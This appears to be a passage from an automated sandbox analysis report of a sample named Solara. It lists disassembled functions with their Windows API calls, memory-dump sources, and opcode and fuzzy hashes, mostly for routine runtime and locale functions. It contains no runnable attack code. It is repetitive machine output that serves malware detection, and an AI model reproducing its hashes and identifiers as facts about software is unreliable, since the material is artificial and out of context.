                                                                                                                                      • Instruction Fuzzy Hash: AA11E332660226BBDB14AF68EC56DAB73ECEF14710B10417AE502C7141EB74ED60CB90
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C16A: GetLastError.KERNEL32(?,?,00215495,00238E38,0000000C), ref: 0021C16E
                                                                                                                                        • Part of subcall function 0021C16A: SetLastError.KERNEL32(00000000), ref: 0021C210
                                                                                                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,0022179C,00000000,00000000,?), ref: 00221B39
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3736152602-0
                                                                                                                                      • Opcode ID: 1c1a86448a001b680aca79735fd572c51e433b611b4902db779b76f32b7fd6a6
                                                                                                                                      • Instruction ID: 135efd61d4bb280393d951bc90025bc6fa5fffdf34479a6a2acd1de833beb014
                                                                                                                                      • Opcode Fuzzy Hash: 1c1a86448a001b680aca79735fd572c51e433b611b4902db779b76f32b7fd6a6
                                                                                                                                      • Instruction Fuzzy Hash: 9501DB376201237BDB285BA59C09EFA7778DF50758F154429ED06A7180FA70ED72C690
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C16A: GetLastError.KERNEL32(?,?,00215495,00238E38,0000000C), ref: 0021C16E
                                                                                                                                        • Part of subcall function 0021C16A: SetLastError.KERNEL32(00000000), ref: 0021C210
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00221840,00000001,?,?,-00000050,?,0022132B,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?), ref: 0022181D
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                      • Opcode ID: 718f09be543d3ad3ba4915c1b69d6a63b30399d7af3ed2d6d649d4291e10b2ae
                                                                                                                                      • Instruction ID: f3e2b5078ccc8f60c54dc9ca671fc87f6dcb5e5e817a874331b241c1355f7af6
                                                                                                                                      • Opcode Fuzzy Hash: 718f09be543d3ad3ba4915c1b69d6a63b30399d7af3ed2d6d649d4291e10b2ae
                                                                                                                                      • Instruction Fuzzy Hash: 7FF022362103142FDB245FB9E885E6A7B90EB80768B04842DF9054B690D6B19C62CA50
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 002180E1: EnterCriticalSection.KERNEL32(?,?,0021C5F8,?,00239290,00000008,0021C4EA,?,?,?), ref: 002180F0
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(0021D1B0,00000001,00239310,0000000C,0021CB11,-00000050), ref: 0021D1F5
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1272433827-0
                                                                                                                                      • Opcode ID: 3b520f6433b3f8fa6405b2105fdb0b46469bfdb29309621b7a13a8657f3c4175
                                                                                                                                      • Instruction ID: 8d28fb3fe5b51fb119fb1c0923c67a33ff76f5f1dff0b0e52e28bb52c8b01584
                                                                                                                                      • Opcode Fuzzy Hash: 3b520f6433b3f8fa6405b2105fdb0b46469bfdb29309621b7a13a8657f3c4175
                                                                                                                                      • Instruction Fuzzy Hash: 7BF03772A20304EFDB10EFA8E846B9977F0EB19721F10806AF4109B2A1CB754990CF40
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 0021C16A: GetLastError.KERNEL32(?,?,00215495,00238E38,0000000C), ref: 0021C16E
                                                                                                                                        • Part of subcall function 0021C16A: SetLastError.KERNEL32(00000000), ref: 0021C210
                                                                                                                                      • EnumSystemLocalesW.KERNEL32(00221960,00000001,?,?,?,00221385,-00000050,-00000002,00000000,?,00000055,?,-00000050,?,?,?), ref: 0022194C
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2417226690-0
                                                                                                                                      • Opcode ID: 1c35a8b7458db28b8337b1c3b019da8e53d60395be5ec1620f963fc0dab0030a
                                                                                                                                      • Instruction ID: c05203ddbd50c5989c97e108acd55ebae1fda50f530d6b802808d33de1ae64ce
                                                                                                                                      • Opcode Fuzzy Hash: 1c35a8b7458db28b8337b1c3b019da8e53d60395be5ec1620f963fc0dab0030a
                                                                                                                                      • Instruction Fuzzy Hash: 91F05C3A30021577CB04AF75EC69A667FA4EFC1B10F0A4058EA098B140C6719892C790
                                                                                                                                      APIs
                                                                                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,00000000,?,-00000050,?,00000000,?,00216E33,?,20001004,00000000,00000002,?,?,00215D3D), ref: 0021CC49
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: InfoLocale
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2299586839-0
                                                                                                                                      • Opcode ID: 261173de11db6891ba19e67159bc535c8686b7a3a9d2ccdbc5e1da9cb86f8e06
                                                                                                                                      • Instruction ID: b7a4d4f6e3df43f496a52f00113f168f6a42d7a68d7fbdf0a6dc390484f650e1
                                                                                                                                      • Opcode Fuzzy Hash: 261173de11db6891ba19e67159bc535c8686b7a3a9d2ccdbc5e1da9cb86f8e06
                                                                                                                                      • Instruction Fuzzy Hash: 30E09A3505022CBBCB122F20ED08ADE3E5AEB14710F108022F804221208B318D71AAE0
                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0000FA00), ref: 0020F8E2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                      • Opcode ID: 81dc85f5d16e3540a74ec4ced993797d754f98f4c67c493e6d892f242f3de0b1
                                                                                                                                      • Instruction ID: 4a12f980cbef1c43dcea0062eb474bf0a2584717c03ecabaac122d3d86eba06e
                                                                                                                                      • Opcode Fuzzy Hash: 81dc85f5d16e3540a74ec4ced993797d754f98f4c67c493e6d892f242f3de0b1
                                                                                                                                      • Instruction Fuzzy Hash:
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: HeapProcess
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 54951025-0
                                                                                                                                      • Opcode ID: 08dd5a83c544bd6c1eced178913c124af8ea33a3b0ce1cfdcddbd9b67637e5e4
                                                                                                                                      • Instruction ID: fc9f08b9518e83b29a108df3b21efbc8cef9a3b98e1a1ab67ea3bba3b7eba13b
                                                                                                                                      • Opcode Fuzzy Hash: 08dd5a83c544bd6c1eced178913c124af8ea33a3b0ce1cfdcddbd9b67637e5e4
                                                                                                                                      • Instruction Fuzzy Hash: 84A011302002028FC3008F32BA0C2083AECAA00AC0300C02AA800CA020EA308000AF00
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: __freea$__alloca_probe_16$Info
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 127012223-0
                                                                                                                                      • Opcode ID: d46ea88ba2381b5599d096642b70a69e44bc4cd434c44688d288479a2ba834c9
                                                                                                                                      • Instruction ID: 3f935af11bf4ce49837cc047e1577b5af0a57c058ab7c46c27e863c80d105e4e
                                                                                                                                      • Opcode Fuzzy Hash: d46ea88ba2381b5599d096642b70a69e44bc4cd434c44688d288479a2ba834c9
                                                                                                                                      • Instruction Fuzzy Hash: 0F71F63292022A7BDF319EE4AC42BEE77BADF59710F140056E804A7992E7758C61CB52
                                                                                                                                      APIs
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?), ref: 0020FE70
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0020FE9C
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000001,?,00000000,00000000), ref: 0020FEDB
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0020FEF8
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000000,?,?,00000000,00000000,00000000), ref: 0020FF37
                                                                                                                                      • __alloca_probe_16.LIBCMT ref: 0020FF54
                                                                                                                                      • LCMapStringEx.KERNEL32(?,?,00000000,00000001,00000000,00000000,00000000,00000000,00000000), ref: 0020FF96
                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 0020FFB9
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ByteCharMultiStringWide$__alloca_probe_16
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2040435927-0
                                                                                                                                      • Opcode ID: 80ddb3a95b770e44cf7496b57b52db33d12645f3daec6add571a5b7fbec8636f
                                                                                                                                      • Instruction ID: 3934f59a70484c1caab02ee096d72cbdd7348c5534277310c53225b6f7d10453
                                                                                                                                      • Opcode Fuzzy Hash: 80ddb3a95b770e44cf7496b57b52db33d12645f3daec6add571a5b7fbec8636f
                                                                                                                                      • Instruction Fuzzy Hash: 4F51AD7266031BABEB705F60CD49FAA7AA9EF41750F244435F910DA9D2DB70DC208B50
                                                                                                                                      APIs
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strrchr
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3213747228-0
                                                                                                                                      • Opcode ID: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                      • Instruction ID: 3a281bac7989c28f4deb643dff084ae60454cf7878b980c52566595a27b5f233
                                                                                                                                      • Opcode Fuzzy Hash: a643fc62b7b2457b9ae550856610bcc28d146668833daaf95fb6042a2f580310
                                                                                                                                      • Instruction Fuzzy Hash: D0B16972A20356AFDF118F64CC41BEE7BE5EF29310F154165EC54AB282D274DDA2CBA0
                                                                                                                                      APIs
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00210D77
                                                                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 00210D7F
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00210E08
                                                                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 00210E33
                                                                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00210E88
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                                                                      • String ID: csm
                                                                                                                                      • API String ID: 1170836740-1018135373
                                                                                                                                      • Opcode ID: 95e4cd3d37b9bbc19a51fb34a29b67510b5a1f14404e4ccb6451256ca7d6e664
                                                                                                                                      • Instruction ID: da9a1e47c2c652f11023a92153f95c9a055712a59543726401bbe0a6fde1f9a0
                                                                                                                                      • Opcode Fuzzy Hash: 95e4cd3d37b9bbc19a51fb34a29b67510b5a1f14404e4ccb6451256ca7d6e664
                                                                                                                                      • Instruction Fuzzy Hash: 82410330A20219ABCF11DF69D884ADE7BF5EF15314F148455E9149B352CBB1AEE1CF90
                                                                                                                                      APIs
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00203CA5
                                                                                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00203CBF
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00203CE0
                                                                                                                                      • __Getctype.LIBCPMT ref: 00203D92
                                                                                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00203DD8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Lockitstd::_$Lockit::_Lockit::~_$Getctype
                                                                                                                                      • String ID: e.#
                                                                                                                                      • API String ID: 3087743877-406694023
                                                                                                                                      • Opcode ID: a4a7780c2e9e46844beb1c46196c48b4d0791c935508ccd2b96afb36dc80430d
                                                                                                                                      • Instruction ID: 9d9076c9775e17e55623fa08f11e663681790c27c41aa31ac6ece3f6abbbf367
                                                                                                                                      • Opcode Fuzzy Hash: a4a7780c2e9e46844beb1c46196c48b4d0791c935508ccd2b96afb36dc80430d
                                                                                                                                      • Instruction Fuzzy Hash: 7C4154B1E103198FCB14DF98E845BAEB7B9FF84720F148219D8156B392DB34AA11CF91
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll), ref: 00210086
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemTimePreciseAsFileTime), ref: 00210094
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetTempPath2W), ref: 002100A5
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                      • String ID: GetSystemTimePreciseAsFileTime$GetTempPath2W$kernel32.dll
                                                                                                                                      • API String ID: 667068680-1047828073
                                                                                                                                      • Opcode ID: 7542640ea8b84392878c26c0a2be84b13187db75d132a599834c88f7f7f7fb0f
                                                                                                                                      • Instruction ID: 76e01de0827f91b766ce5bccb534bc8c8d78a1dab27a5690efe076d6dd39ec90
                                                                                                                                      • Opcode Fuzzy Hash: 7542640ea8b84392878c26c0a2be84b13187db75d132a599834c88f7f7f7fb0f
                                                                                                                                      • Instruction Fuzzy Hash: 97D0C771661610BFC310AFF47C0D9893EBDFA0BB127019953F441E2360DF749A118B54
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.1647220646.0000000000201000.00000020.00000001.01000000.00000003.sdmp, Offset: 00200000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.1647186799.0000000000200000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647250418.000000000022D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647277334.000000000023A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647298153.000000000023B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647324981.000000000023F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647347446.0000000000242000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.1647387372.000000000028D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_200000_Solara.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID:
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID:
                                                                                                                                      • Opcode ID: 86a43189216d846be34f33d411ab8c537fb9dabcb3e2128ef3ec117913cb017b
                                                                                                                                      • Instruction ID: a52357d37ccc8a9f362264ad3fd8f3e85849899b52d0f9cd9193d72c69bae1d3
                                                                                                                                      • Opcode Fuzzy Hash: 86a43189216d846be34f33d411ab8c537fb9dabcb3e2128ef3ec117913cb017b
                                                                                                                                      • Instruction Fuzzy Hash: 16B1F570E24A79BFDB01DFE8E844BADBBB4BF55300F148259E90497291C7B19961CFA0
                                                                                                                                      APIs
